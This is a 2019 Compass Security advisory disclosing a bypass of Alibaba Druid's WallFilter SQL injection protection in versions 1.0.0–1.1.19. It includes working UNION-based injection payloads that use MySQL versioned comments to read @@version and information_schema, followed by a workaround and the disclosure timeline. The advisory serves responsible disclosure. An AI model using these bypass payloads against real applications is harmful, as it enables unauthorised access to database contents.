############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Alibaba Druid [1] # CSNC ID: CSNC-2019-022 # Subject: Anti SQL Injection Filter Bypass # Risk: High # Effect: Remotely exploitable # Authors: Emanuele Barbeno and Lukasz D. (advisories@compass-security.com) # Date: 02.09.2019 # ############################################################# Introduction: ------------- Druid is one of the best database connection pools written in JAVA. Druid provides powerful monitoring functionalities and more. Druid provides WallFilter, it is based on the SQL semantic analysis to defense SQL injection attacks. [2] WallFilter was found to be insufficient in preventing SQL injection attacks as its filtering mechanism can be bypassed. The bypass allows an attacker to access all schemas and variables that are normally blocked by WallFilter. Affected: --------- The following Druid versions are vulnerable: - 1.0.0 - 1.1.19 Technical Description: ---------------------- Assume that an application uses the following MySQL query: SELECT name, surname FROM users WHERE name='', where is a place where unescaped user input is inserted. If the attacker inputs: ' UNION SELECT @@version, 'string1 the resulting query is blocked by WallFilter with the following exception: "sql injection violation, variable not allow : @@version" If the attacker inputs: ' UNION SELECT (select table_name FROM information_schema.tables limit 1,1), 'string1 the resulting query is blocked by WallFilter with the following exception: "sql injection violation, deny schema : information_schema" However, the WallFilter can be bypassed with a slight modification of the input: ' UNION SELECT /*! @@version,*/ 'string1 ' UNION SELECT /*! (select table_name FROM information_schema.tables limit 1,1),*/ 'string1 The bypass works even if the WallFilter is configured to disallow MySQL hints. Workaround / Fix: ----------------- It needs to be ensured that applications using Druid for accessing MySQL databases do not rely on WallFilter only but also handle user input with sufficient care in order to prevent SQL injection vulnerabilities. Timeline: --------- 2019-06-20: Vulnerability discovered 2019-06-24: Initial vendor notification 2019-08-28: Patched version released [3] 2019-09-02: Public disclosure References: ----------- [1]: https://github.com/alibaba/druid [2]: https://github.com/alibaba/druid/wiki/FAQ [3]: https://github.com/alibaba/druid/commit/df7ef2fd663c7c717dc919cf298cf69af0cb56eb